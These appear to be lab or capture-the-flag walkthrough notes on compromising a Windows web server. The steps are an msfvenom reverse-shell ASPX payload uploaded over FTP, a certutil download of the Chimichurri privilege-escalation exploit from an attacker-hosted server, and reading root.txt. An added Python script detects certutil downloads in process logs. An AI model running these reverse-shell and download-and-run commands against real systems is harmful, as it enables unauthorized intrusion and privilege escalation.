Create a non-Meterpreter shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4444 -f aspx > manual.aspx
FTP to victim machine:
ftp 10.10.10.5
Open a listener on the same port used when creating the shell:
nc -nvlp 4444
Navigate to website:
10.10.10.5/manual.aspx
Should have shell.
Find an exploit that works (we found Chimichurri 59) and download it.
Get it there:
Host a Python server in the downloads folder (or wherever it is):
cd Downloads/
python3 -m http.server 8080
On the victim/Windows:
Go to temp folder:
cd c:\windows\temp
wget for Windows is certutil:
certutil -urlcache -f http://10.10.14.19:8080/Chimichurri.exe ms.exe
-f is file
Chimichurri.exe is the name of what we downloaded
To check it’s there you can run dir and check for ms.exe:
dir
Find out usage. Chimichurri usage:
ms.exe 10.10.14.19 5555
Arguments: the exe, attacker machine IP, port opened on netcat on Kali (open a new one before hitting enter)
cd to desktop:
cd c:\users\administrator\desktop
cat file:
type root.txt
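
Seen from the defender's side, the certutil transfer in the steps above is the most distinctive command in this chain to look for in process-creation logs. The following is an added example, not part of the original notes: it scans command lines for certutil -urlcache downloads and reports the URL and output file. The sample lines, the extension list and the names inspect_command_line and scan are constructed for illustration.

```python
import re
import shlex

# Constructed sample command lines, shaped like the CommandLine field of a
# process-creation log. They are illustrative, not captured from a real host.
SAMPLE_COMMAND_LINES = [
    r"certutil -urlcache -f http://10.10.14.19:8080/Chimichurri.exe ms.exe",
    r"CertUtil.exe /URLCache /split /f https://example.test/a.bin C:\Windows\Temp\a.bin",
    r"certutil -hashfile C:\Windows\Temp\ms.exe SHA256",
    r"certutil -urlcache *",
    r"cmd.exe /c dir c:\windows\temp",
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".dll", ".bat", ".ps1", ".aspx")  # assumed watch list


def inspect_command_line(cmdline):
    """Hypothetical helper: describe a certutil URL download, or return None."""
    # posix=False keeps Windows backslashes intact while splitting on whitespace.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens:
        return None
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    # certutil accepts options prefixed with '-' or '/', in any letter case.
    options = {t[1:].lower() for t in tokens[1:] if t[:1] in ("-", "/")}
    positional = [t for t in tokens[1:] if t[:1] not in ("-", "/")]
    urls = [p for p in positional if URL_RE.match(p)]
    if "urlcache" not in options or not urls:
        return None
    output = next((p for p in positional if not URL_RE.match(p)), None)
    return {
        "url": urls[0],
        "output": output,
        "writes_executable": bool(output) and output.lower().endswith(EXECUTABLE_EXT),
    }


def scan(command_lines):
    """Return (command line, finding) pairs for every certutil download seen."""
    pairs = ((line, inspect_command_line(line)) for line in command_lines)
    return [(line, f) for line, f in pairs if f]


if __name__ == "__main__":
    for line, finding in scan(SAMPLE_COMMAND_LINES):
        print(finding["url"], "->", finding["output"], "| from:", line)
```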